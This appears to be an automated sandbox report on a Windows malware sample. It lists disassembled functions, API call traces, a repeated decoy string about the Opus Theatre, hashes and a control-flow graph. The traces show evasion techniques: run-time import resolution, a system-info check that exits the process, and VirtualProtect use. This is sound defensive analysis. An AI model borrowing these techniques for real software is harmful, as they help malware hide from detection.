                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                        • strlen.MSVCRT ref: 004046F0
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                        Strings
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                        • API String ID: 2127927946-2218711628
                                                        • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                        • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                                        Function 00417850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocNameProcessUser
                                                        • String ID:
                                                        • API String ID: 1206570057-0
                                                        • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                        • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                        • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                        • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                        Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                        • ExitProcess.KERNEL32 ref: 0040117E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitInfoProcessSystem
                                                        • String ID:
                                                        • API String ID: 752954902-0
                                                        • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                        • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                        • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                        • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6
                                                        Function 00419C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                        APIs
                                                        • GetProcAddress.KERNEL32(74DD0000,007F85A0), ref: 00419C2D
                                                        • GetProcAddress.KERNEL32(74DD0000,007F85E0), ref: 00419C45
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA330), ref: 00419C5E
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA348), ref: 00419C76
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA2E8), ref: 00419C8E
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA360), ref: 00419CA7
                                                        • GetProcAddress.KERNEL32(74DD0000,007F7D80), ref: 00419CBF
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA300), ref: 00419CD7
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA318), ref: 00419CF0
                                                        • GetProcAddress.KERNEL32(74DD0000,00829690), ref: 00419D08
                                                        • GetProcAddress.KERNEL32(74DD0000,00829558), ref: 00419D20
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8560), ref: 00419D39
                                                        • GetProcAddress.KERNEL32(74DD0000,007F86C0), ref: 00419D51
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8600), ref: 00419D69
                                                        • GetProcAddress.KERNEL32(74DD0000,007F85C0), ref: 00419D82
                                                        • GetProcAddress.KERNEL32(74DD0000,00829498), ref: 00419D9A
                                                        • GetProcAddress.KERNEL32(74DD0000,00829630), ref: 00419DB2
                                                        • GetProcAddress.KERNEL32(74DD0000,007F7DA8), ref: 00419DCB
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8480), ref: 00419DE3
                                                        • GetProcAddress.KERNEL32(74DD0000,008294E0), ref: 00419DFB
                                                        • GetProcAddress.KERNEL32(74DD0000,00829420), ref: 00419E14
                                                        • GetProcAddress.KERNEL32(74DD0000,00829648), ref: 00419E2C
                                                        • GetProcAddress.KERNEL32(74DD0000,008294F8), ref: 00419E44
                                                        • GetProcAddress.KERNEL32(74DD0000,007F84A0), ref: 00419E5D
                                                        • GetProcAddress.KERNEL32(74DD0000,008296F0), ref: 00419E75
                                                        • GetProcAddress.KERNEL32(74DD0000,00829528), ref: 00419E8D
                                                        • GetProcAddress.KERNEL32(74DD0000,00829450), ref: 00419EA6
                                                        • GetProcAddress.KERNEL32(74DD0000,008295E8), ref: 00419EBE
                                                        • GetProcAddress.KERNEL32(74DD0000,00829438), ref: 00419ED6
                                                        • GetProcAddress.KERNEL32(74DD0000,008295B8), ref: 00419EEF
                                                        • GetProcAddress.KERNEL32(74DD0000,00829660), ref: 00419F07
                                                        • GetProcAddress.KERNEL32(74DD0000,00829510), ref: 00419F1F
                                                        • GetProcAddress.KERNEL32(74DD0000,00829678), ref: 00419F38
                                                        • GetProcAddress.KERNEL32(74DD0000,007F2A08), ref: 00419F50
                                                        • GetProcAddress.KERNEL32(74DD0000,008295A0), ref: 00419F68
                                                        • GetProcAddress.KERNEL32(74DD0000,008294B0), ref: 00419F81
                                                        • GetProcAddress.KERNEL32(74DD0000,007F84E0), ref: 00419F99
                                                        • GetProcAddress.KERNEL32(74DD0000,00829468), ref: 00419FB1
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8540), ref: 00419FCA
                                                        • GetProcAddress.KERNEL32(74DD0000,008295D0), ref: 00419FE2
                                                        • GetProcAddress.KERNEL32(74DD0000,00829480), ref: 00419FFA
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8580), ref: 0041A013
                                                        • GetProcAddress.KERNEL32(74DD0000,007F80C0), ref: 0041A02B
                                                        • LoadLibraryA.KERNEL32(008294C8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                        • LoadLibraryA.KERNEL32(00829600,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                        • LoadLibraryA.KERNEL32(00829618,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                        • LoadLibraryA.KERNEL32(00829540,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                        • LoadLibraryA.KERNEL32(00829570,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                        • LoadLibraryA.KERNEL32(00829588,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                        • LoadLibraryA.KERNEL32(008296A8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                        • LoadLibraryA.KERNEL32(008296C0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                        • GetProcAddress.KERNEL32(75290000,007F82A0), ref: 0041A0DA
                                                        • GetProcAddress.KERNEL32(75290000,008296D8), ref: 0041A0F2
                                                        • GetProcAddress.KERNEL32(75290000,00826738), ref: 0041A10A
                                                        • GetProcAddress.KERNEL32(75290000,00829708), ref: 0041A123
                                                        • GetProcAddress.KERNEL32(75290000,007F8300), ref: 0041A13B
                                                        • GetProcAddress.KERNEL32(6FCD0000,007F7EC0), ref: 0041A160
                                                        • GetProcAddress.KERNEL32(6FCD0000,007F8320), ref: 0041A179
                                                        • GetProcAddress.KERNEL32(6FCD0000,007F7C68), ref: 0041A191
                                                        • GetProcAddress.KERNEL32(6FCD0000,00829720), ref: 0041A1A9
                                                        • GetProcAddress.KERNEL32(6FCD0000,00829768), ref: 0041A1C2
                                                        • GetProcAddress.KERNEL32(6FCD0000,007F83E0), ref: 0041A1DA
                                                        • GetProcAddress.KERNEL32(6FCD0000,007F8160), ref: 0041A1F2
                                                        • GetProcAddress.KERNEL32(6FCD0000,00829738), ref: 0041A20B
                                                        • GetProcAddress.KERNEL32(752C0000,007F83C0), ref: 0041A22C
                                                        • GetProcAddress.KERNEL32(752C0000,007F8440), ref: 0041A244
                                                        • GetProcAddress.KERNEL32(752C0000,008297B0), ref: 0041A25D
                                                        • GetProcAddress.KERNEL32(752C0000,008297E0), ref: 0041A275
                                                        • GetProcAddress.KERNEL32(752C0000,007F8080), ref: 0041A28D
                                                        • GetProcAddress.KERNEL32(74EC0000,007F79E8), ref: 0041A2B3
                                                        • GetProcAddress.KERNEL32(74EC0000,007F7BA0), ref: 0041A2CB
                                                        • GetProcAddress.KERNEL32(74EC0000,00829798), ref: 0041A2E3
                                                        • GetProcAddress.KERNEL32(74EC0000,007F8100), ref: 0041A2FC
                                                        • GetProcAddress.KERNEL32(74EC0000,007F80E0), ref: 0041A314
                                                        • GetProcAddress.KERNEL32(74EC0000,007F78D0), ref: 0041A32C
                                                        • GetProcAddress.KERNEL32(75BD0000,008297C8), ref: 0041A352
                                                        • GetProcAddress.KERNEL32(75BD0000,007F8140), ref: 0041A36A
                                                        • GetProcAddress.KERNEL32(75BD0000,00826878), ref: 0041A382
                                                        • GetProcAddress.KERNEL32(75BD0000,00829750), ref: 0041A39B
                                                        • GetProcAddress.KERNEL32(75BD0000,00829780), ref: 0041A3B3
                                                        • GetProcAddress.KERNEL32(75BD0000,007F81A0), ref: 0041A3CB
                                                        • GetProcAddress.KERNEL32(75BD0000,007F8120), ref: 0041A3E4
                                                        • GetProcAddress.KERNEL32(75BD0000,008299F0), ref: 0041A3FC
                                                        • GetProcAddress.KERNEL32(75BD0000,00829A50), ref: 0041A414
                                                        • GetProcAddress.KERNEL32(75A70000,007F80A0), ref: 0041A436
                                                        • GetProcAddress.KERNEL32(75A70000,00829A38), ref: 0041A44E
                                                        • GetProcAddress.KERNEL32(75A70000,00829A68), ref: 0041A466
                                                        • GetProcAddress.KERNEL32(75A70000,00829858), ref: 0041A47F
                                                        • GetProcAddress.KERNEL32(75A70000,008298B8), ref: 0041A497
                                                        • GetProcAddress.KERNEL32(75450000,007F82C0), ref: 0041A4B8
                                                        • GetProcAddress.KERNEL32(75450000,007F8400), ref: 0041A4D1
                                                        • GetProcAddress.KERNEL32(75DA0000,007F82E0), ref: 0041A4F2
                                                        • GetProcAddress.KERNEL32(75DA0000,00829AF8), ref: 0041A50A
                                                        • GetProcAddress.KERNEL32(6F070000,007F8360), ref: 0041A530
                                                        • GetProcAddress.KERNEL32(6F070000,007F8340), ref: 0041A548
                                                        • GetProcAddress.KERNEL32(6F070000,007F8380), ref: 0041A560
                                                        • GetProcAddress.KERNEL32(6F070000,00829B10), ref: 0041A579
                                                        • GetProcAddress.KERNEL32(6F070000,007F83A0), ref: 0041A591
                                                        • GetProcAddress.KERNEL32(6F070000,007F8420), ref: 0041A5A9
                                                        • GetProcAddress.KERNEL32(6F070000,007F8060), ref: 0041A5C2
                                                        • GetProcAddress.KERNEL32(6F070000,007F8180), ref: 0041A5DA
                                                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                                        • GetProcAddress.KERNEL32(75AF0000,00829AB0), ref: 0041A629
                                                        • GetProcAddress.KERNEL32(75AF0000,008266F8), ref: 0041A641
                                                        • GetProcAddress.KERNEL32(75AF0000,008299D8), ref: 0041A659
                                                        • GetProcAddress.KERNEL32(75AF0000,00829A80), ref: 0041A672
                                                        • GetProcAddress.KERNEL32(75D90000,007F8200), ref: 0041A693
                                                        • GetProcAddress.KERNEL32(6CAD0000,008299A8), ref: 0041A6B4
                                                        • GetProcAddress.KERNEL32(6CAD0000,007F81C0), ref: 0041A6CD
                                                        • GetProcAddress.KERNEL32(6CAD0000,00829AC8), ref: 0041A6E5
                                                        • GetProcAddress.KERNEL32(6CAD0000,00829918), ref: 0041A6FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
